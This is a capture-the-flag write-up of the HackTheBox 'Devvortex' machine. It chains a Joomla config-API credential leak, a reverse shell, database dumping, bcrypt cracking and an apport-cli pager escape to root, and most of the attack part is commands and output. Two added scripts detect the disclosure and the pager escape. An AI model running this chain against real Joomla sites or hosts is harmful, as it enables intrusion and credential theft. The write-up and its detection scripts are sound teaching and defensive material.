
HackTheBox - Devvortex

This box starts off with a website for a consultancy that offers different development services.

[Screenshot: homepage of devvortex.htb]

Reconnaissance

We find a subdomain called "dev.devvortex.htb".

$ gobuster vhost -u http://devvortex.htb -w ~/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://devvortex.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /home/kali/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.5
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
2023/11/27 09:44:35 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.devvortex.htb Status: 200 [Size: 23221]
Progress: 4864 / 4990 (97.47%)
===============================================================
2023/11/27 09:44:48 Finished
===============================================================

Fuzzing different directories, we find a file called "README.txt".

$ gobuster dir -u dev.devvortex.htb -w ~/wordlists/SecLists/Discovery/Web-Content/raft-small-files.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.devvortex.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/wordlists/SecLists/Discovery/Web-Content/raft-small-files.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/11/27 09:49:51 Starting gobuster in directory enumeration mode
===============================================================
/LICENSE.txt          (Status: 200) [Size: 18092]
/index.php            (Status: 200) [Size: 23221]
/.htaccess            (Status: 403) [Size: 162]
/robots.txt           (Status: 200) [Size: 764]
/.                    (Status: 200) [Size: 23221]
/.jpg                 (Status: 403) [Size: 162]
/.svn                 (Status: 403) [Size: 162]
/.gif                 (Status: 403) [Size: 162]
/.html                (Status: 403) [Size: 162]
/.cache               (Status: 403) [Size: 162]
/.smileys             (Status: 403) [Size: 162]
/.css                 (Status: 403) [Size: 162]
/.hcc.thumbs          (Status: 403) [Size: 162]
/configuration.php    (Status: 200) [Size: 0]
/.js                  (Status: 403) [Size: 162]
/.png                 (Status: 403) [Size: 162]
/.bmp                 (Status: 403) [Size: 162]
/.jpeg                (Status: 403) [Size: 162]
/.swf                 (Status: 403) [Size: 162]
/.pdf                 (Status: 403) [Size: 162]
/.ftpquota            (Status: 403) [Size: 162]
/README.txt           (Status: 200) [Size: 4942]
/.zip                 (Status: 403) [Size: 162]
Progress: 1346 / 11425 (11.78%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/11/27 09:50:11 Finished
===============================================================

The "README.txt" file reveals the Joomla version in use.

[Screenshot: README.txt]

Joomla's web-services API exposes the site configuration at /api/index.php/v1/config/application. On this box the endpoint answers an unauthenticated request once public=true is appended, and the response includes the database user and password:

$ curl -v http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
*   Trying 10.129.55.117:80...
* Connected to dev.devvortex.htb (10.129.55.117) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: dev.devvortex.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Mon, 27 Nov 2023 08:42:38 GMT
< Content-Type: application/vnd.api+json; charset=utf-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 27 Nov 2023 08:42:38 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
<
{"links":{"self":"http:\/\/dev.devvortex.htb\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/dev.devvortex.htb\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/dev.devvortex.htb\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.
Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"Development","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"id":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"lewis","id":224}},{"type":"application","id":"224","attributes":{"password":"P4ntherg0t1n5r3c0n##","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"sd4fg_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
* Connection #0 to host dev.devvortex.htb left intact
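From the defender's side, the request above leaves an obvious trace in the web-server log. As an added detection example (not part of the original write-up), the following Python script scans nginx access-log lines for requests to the Joomla web-services configuration route, flags the ones that were answered with a 200 and a body as likely disclosures, and counts hits per client. The log lines are constructed for this example, and the log format is assumed to be nginx's default "combined" format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# nginx "combined" log format (assumed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Joomla 4 web-services route for the site configuration, as seen in the write-up.
CONFIG_ROUTE = "/api/index.php/v1/config/application"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding for a config-API request, or None for any other request."""
    parts = urlsplit(entry["target"])
    if not parts.path.startswith(CONFIG_ROUTE):
        return None
    public = parse_qs(parts.query).get("public", [""])[0].lower() == "true"
    status = int(entry["status"])
    size = int(entry["size"]) if entry["size"].isdigit() else 0
    # A 200 with a body on this route means the configuration (DB user, password,
    # secret, ...) was served to the client; anything else is still a probe worth noting.
    severity = "DISCLOSURE" if status == 200 and size > 0 else "PROBE"
    return {"ip": entry["ip"], "time": entry["time"], "status": status,
            "public_param": public, "severity": severity, "ua": entry["ua"]}


def scan(lines):
    """Run every parsable line through classify() and collect the findings in order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding:
            findings.append(finding)
    return findings


def by_ip(findings):
    """Count findings per source address."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed sample log: two paginated config reads by one client, one rejected
# probe without the public parameter, and ordinary site traffic.
SAMPLE_LOG = """\
10.10.14.17 - - [27/Nov/2023:08:42:38 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 4120 "-" "curl/7.88.1"
10.10.14.17 - - [27/Nov/2023:08:42:40 +0000] "GET /api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20 HTTP/1.1" 200 3982 "-" "curl/7.88.1"
203.0.113.5 - - [27/Nov/2023:09:01:12 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 118 "-" "python-requests/2.31"
198.51.100.9 - - [27/Nov/2023:09:05:00 +0000] "GET /index.php HTTP/1.1" 200 23221 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    results = scan(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"{f['severity']:<10} {f['ip']:<14} {f['status']} public={f['public_param']} {f['ua']}")
    print("per client:", by_ip(results))
```

Run against a real log with `scan(open("/var/log/nginx/access.log"))`; the DISCLOSURE entries tell you which clients already hold the database credentials and the site secret, which is what decides whether rotating them is optional or mandatory.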

$ curl -s http://dev.devvortex.htb/templates/cassiopeia/error.php/error.php

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.55.117] 42342
bash: cannot set terminal process group (813): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ cd ..
www-data@devvortex:~/dev.devvortex.htb/templates$ cd ..
www-data@devvortex:~/dev.devvortex.htb$ ls -lah
total 120K
drwxr-xr-x 17 www-data www-data 4.0K Sep 25 16:44 .
drwxr-xr-x  4 root     root     4.0K Oct 29 16:07 ..
-rwxr-xr-x  1 www-data www-data  18K Dec 13  2022 LICENSE.txt
-rwxr-xr-x  1 www-data www-data 4.9K Dec 13  2022 README.txt
drwxr-xr-x 11 www-data www-data 4.0K Dec 13  2022 administrator
drwxr-xr-x  5 www-data www-data 4.0K Dec 13  2022 api
drwxr-xr-x  2 www-data www-data 4.0K Dec 13  2022 cache
drwxr-xr-x  2 www-data www-data 4.0K Dec 13  2022 cli
drwxr-xr-x 18 www-data www-data 4.0K Dec 13  2022 components
-rw-r--r--  1 www-data www-data 2.0K Sep 25 16:44 configuration.php
-rwxr-xr-x  1 www-data www-data 6.7K Dec 13  2022 htaccess.txt
drwxr-xr-x  5 www-data www-data 4.0K Dec 13  2022 images
drwxr-xr-x  2 www-data www-data 4.0K Dec 13  2022 includes
-r-xr-x---  1 www-data www-data 1.1K Dec 13  2022 index.php
drwxr-xr-x  4 www-data www-data 4.0K Dec 13  2022 language
drwxr-xr-x  6 www-data www-data 4.0K Dec 13  2022 layouts
drwxr-xr-x  6 www-data www-data 4.0K Dec 13  2022 libraries
drwxr-xr-x 71 www-data www-data 4.0K Dec 13  2022 media
drwxr-xr-x 26 www-data www-data 4.0K Dec 13  2022 modules
drwxr-xr-x 25 www-data www-data 4.0K Dec 13  2022 plugins
-rwxr-xr-x  1 www-data www-data  764 Dec 13  2022 robots.txt
drwxr-xr-x  4 www-data www-data 4.0K Dec 13  2022 templates
drwxr-xr-x  2 www-data www-data 4.0K Dec 13  2022 tmp
-rwxr-xr-x  1 www-data www-data 3.0K Dec 13  2022 web.config.txt
www-data@devvortex:~/dev.devvortex.htb$ cat configuration.php
<?php
class JConfig {
	public $offline = false;
	public $offline_message = 'This site is down for maintenance.
Please check back again soon.';
	public $display_offline_message = 1;
	public $offline_image = '';
	public $sitename = 'Development';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = 20;
	public $access = 1;
	public $debug = false;
	public $debug_lang = false;
	public $debug_lang_const = true;
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'lewis';
	public $password = 'P4ntherg0t1n5r3c0n##';
	public $db = 'joomla';
	public $dbprefix = 'sd4fg_';
	public $dbencryption = 0;
	public $dbsslverifyservercert = false;
	public $dbsslkey = '';
	public $dbsslcert = '';
	public $dbsslca = '';
	public $dbsslcipher = '';
	public $force_ssl = 0;
	public $live_site = '';
	public $secret = 'ZI7zLTbaGKliS9gq';
	public $gzip = false;
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
	public $offset = 'UTC';
	public $mailonline = true;
	public $mailer = 'mail';
	public $mailfrom = 'lewis@devvortex.htb';
	public $fromname = 'Development';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = false;
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = 25;
	public $caching = 0;
	public $cache_handler = 'file';
	public $cachetime = 15;
	public $cache_platformprefix = false;
	public $MetaDesc = '';
	public $MetaAuthor = true;
	public $MetaVersion = false;
	public $robots = '';
	public $sef = true;
	public $sef_rewrite = false;
	public $sef_suffix = false;
	public $unicodeslugs = false;
	public $feed_limit = 10;
	public $feed_email = 'none';
	public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
	public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
	public $lifetime = 15;
	public $session_handler = 'database';
	public $shared_session = false;
	public $session_metadata = true;
}
www-data@devvortex:~/dev.devvortex.htb$

www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##'
mysql: [Warning] Using a password on the command line interface can be insecure.
show databases;
show tables;
Database
information_schema
joomla
performance_schema
ERROR 1046 (3D000) at line 2: No database selected
www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##' -e "USE joomla; SHOW TABLES;"
mysql: [Warning] Using a password on the command line interface can be insecure.
Tables_in_joomla
sd4fg_action_log_config
sd4fg_action_logs
sd4fg_action_logs_extensions
sd4fg_action_logs_users
sd4fg_assets
sd4fg_associations
sd4fg_banner_clients
sd4fg_banner_tracks
sd4fg_banners
sd4fg_categories
sd4fg_contact_details
sd4fg_content
sd4fg_content_frontpage
sd4fg_content_rating
sd4fg_content_types
sd4fg_contentitem_tag_map
sd4fg_extensions
sd4fg_fields
sd4fg_fields_categories
sd4fg_fields_groups
sd4fg_fields_values
sd4fg_finder_filters
sd4fg_finder_links
sd4fg_finder_links_terms
sd4fg_finder_logging
sd4fg_finder_taxonomy
sd4fg_finder_taxonomy_map
sd4fg_finder_terms
sd4fg_finder_terms_common
sd4fg_finder_tokens
sd4fg_finder_tokens_aggregate
sd4fg_finder_types
sd4fg_history
sd4fg_languages
sd4fg_mail_templates
sd4fg_menu
sd4fg_menu_types
sd4fg_messages
sd4fg_messages_cfg
sd4fg_modules
sd4fg_modules_menu
sd4fg_newsfeeds
sd4fg_overrider
sd4fg_postinstall_messages
sd4fg_privacy_consents
sd4fg_privacy_requests
sd4fg_redirect_links
sd4fg_scheduler_tasks
sd4fg_schemas
sd4fg_session
sd4fg_tags
sd4fg_template_overrides
sd4fg_template_styles
sd4fg_ucm_base
sd4fg_ucm_content
sd4fg_update_sites
sd4fg_update_sites_extensions
sd4fg_updates
sd4fg_user_keys
sd4fg_user_mfa
sd4fg_user_notes
sd4fg_user_profiles
sd4fg_user_usergroup_map
sd4fg_usergroups
sd4fg_users
sd4fg_viewlevels
sd4fg_webauthn_credentials
sd4fg_workflow_associations
sd4fg_workflow_stages
sd4fg_workflow_transitions
sd4fg_workflows
www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##' -e "USE joomla; SELECT * FROM sd4fg_users;"
mysql: [Warning] Using a password on the command line interface can be insecure.
id	name	username	email	password	block	sendEmail	registerDate	lastvisitDate	activation	params	lastResetTime	resetCount	otpKey	otep	requireReset	authProvider
649	lewis	lewis	lewis@devvortex.htb	$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u	0	1	2023-09-25 16:44:24	2023-11-27 09:23:50	0		NULL	0			0	
650	logan paul	logan	logan@devvortex.htb	$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12	0	0	2023-09-26 19:15:42	NULL		{"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"}	NULL	0			0	
www-data@devvortex:~/dev.devvortex.htb$

┌──(kali㉿kali)-[~/ctf/htb/devvortex]
└─$ cat hash.txt
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

┌──(kali㉿kali)-[~/ctf/htb/devvortex]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho    (logan)
1g 0:00:00:14 DONE (2023-11-27 10:31) 0.06930g/s 97.29p/s 97.29c/s 97.29C/s iceman..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

$ ssh logan@10.129.55.117
logan@devvortex:~$ cat user.txt
8debb75959308d8edf8909d7e44aeaba

logan@devvortex:~$ dpkg --list
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                                  Version                           Architecture Description
+++-=====================================-=================================-============-====================>
ii  accountsservice                       0.6.55-0ubuntu12~20.04.6          amd64        query and manipulate>
ii  adduser                               3.118ubuntu2                      all          add and remove users>
ii  alsa-topology-conf                    1.2.2-1                           all          ALSA topology config>
ii  alsa-ucm-conf                         1.2.2-1ubuntu0.13                 all          ALSA Use Case Manage>
ii  alsa-utils                            1.2.2-1ubuntu2.1                  amd64        Utilities for config>
ii  amd64-microcode                       3.20191218.1ubuntu1.2             amd64        Processor microcode >
ii  apparmor                              2.13.3-7ubuntu5.2                 amd64        user-space parser ut>
hi  apport                                2.20.11-0ubuntu27                 all          automatically genera>
ii  apport-symptoms                       0.23                              all          symptom scripts for >
ii  apt                                   2.0.10                            amd64        commandline package >
ii  apt-utils                             2.0.10                            amd64        package management r>
ii  at                                    3.1.23-1ubuntu1                   amd64        Delayed job executio>
ii  auditd                                1:2.8.5-2ubuntu6                  amd64        User space tools for>
ii  base-files                            11ubuntu5.7                       amd64        Debian base system m>
ii  base-passwd                           3.5.47                            amd64        Debian base system m>
ii  bash                                  5.0-6ubuntu1.2                    amd64        GNU Bourne Again SHe>
ii  bash-completion                       1:2.10-1ubuntu1                   all          programmable complet>
ii  bc                                    1.07.1-2build1                    amd64        GNU bc arbitrary pre>
ii  bcache-tools                          1.0.8-3ubuntu0.1                  amd64        bcache userspace too>
ii  bind9-dnsutils                        1:9.16.1-0ubuntu2.16              amd64        Clients provided wit>
ii  bind9-host                            1:9.16.1-0ubuntu2.16              amd64        DNS Lookup Utility
ii  bind9-libs:amd64                      1:9.16.1-0ubuntu2.16              amd64        Shared Libraries use>
ii  binutils                              2.34-6ubuntu1.6                   amd64        GNU assembler, linke>
ii  binutils-common:amd64                 2.34-6ubuntu1.6                   amd64        Common files for the>
ii  binutils-x86-64-linux-gnu             2.34-6ubuntu1.6                   amd64        GNU binary utilities>
ii  bolt                                  0.9.1-2~ubuntu20.04.2             amd64        system daemon to man>
logan@devvortex:~$ sudo apport-cli -f --package=adduser --save=/var/crash/adduser.crash

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
...................
logan@devvortex:~$ sudo /usr/bin/apport-cli -c /var/crash/adduser.crash

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (3.0 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): v
!sh
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
509cf3d203fbce02c527dd479054d6a6

Alternative:

$ sudo apport-cli -c /var/crash/test.crash
v
!cp /bin/bash /tmp/b
v
!chmod +s /tmp/b
$ /tmp/b -p
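The escalation above has a recognisable shape on the host: a root shell whose parent is a pager (less) that itself runs under a program started through sudo. As an added detection example (not part of the original write-up), the Python script below walks a process snapshot and reports exactly that pattern. It generalises beyond apport-cli to any sudo-launched program that hands its output to a pager. The process snapshot is constructed for this example; on a real system the records would come from /proc or from auditd, and the comm value for a script such as apport-cli is assumed to equal the script name.

```python
from collections import namedtuple

# Minimal process record, constructed for this example; a real collector would read
# /proc/<pid>/status (Pid, PPid, Uid, Name) or auditd SYSCALL/EXECVE records.
Proc = namedtuple("Proc", "pid ppid uid comm")

PAGERS = {"less", "more", "pager", "most"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def ancestors(pid, table):
    """Yield the parent chain of pid, nearest parent first; stop at unknown pids or loops."""
    seen = {pid}
    proc = table.get(pid)
    while proc is not None and proc.ppid in table and proc.ppid not in seen:
        seen.add(proc.ppid)
        proc = table[proc.ppid]
        yield proc


def find_pager_escapes(procs):
    """Return (pid, chain) for every root shell spawned from a pager inside a sudo session.

    The chain string reads from the shell back to the sudo process that granted root.
    """
    table = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        if p.comm not in SHELLS or p.uid != 0:
            continue
        chain = [a.comm for a in ancestors(p.pid, table)]
        # Shape of the escape: root shell <- pager <- ... <- sudo
        if not chain or chain[0] not in PAGERS or "sudo" not in chain[1:]:
            continue
        upto_sudo = chain[:chain.index("sudo") + 1]
        hits.append((p.pid, " <- ".join([p.comm] + upto_sudo)))
    return hits


# Constructed snapshot: logan's SSH session runs `sudo apport-cli`, which hands the
# report to less, and a shell is spawned from the pager; plus benign look-alikes.
SNAPSHOT = [
    Proc(1, 0, 0, "systemd"),
    Proc(900, 1, 0, "sshd"),
    Proc(950, 900, 1000, "bash"),        # logan's login shell
    Proc(1200, 950, 0, "sudo"),
    Proc(1201, 1200, 0, "apport-cli"),
    Proc(1202, 1201, 0, "less"),
    Proc(1203, 1202, 0, "sh"),           # spawned from the pager's "!" command
    Proc(1300, 950, 1000, "less"),       # logan paging a file as himself
    Proc(1301, 1300, 1000, "sh"),        # non-root shell from a pager: no escalation
    Proc(1400, 950, 0, "sudo"),
    Proc(1401, 1400, 0, "bash"),         # plain `sudo bash`: root, but no pager involved
]

if __name__ == "__main__":
    for pid, chain in find_pager_escapes(SNAPSHOT):
        print(f"pid {pid}: {chain}")
```

The root-cause fix is the sudo rule itself: a program that opens an interactive pager as root should not be on the allow list, and where it must be, the detection above (scheduled, or driven by auditd execve events keyed on the `!sh` parent chain) gives you the alert.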

This post is licensed under CC BY 4.0 by the author.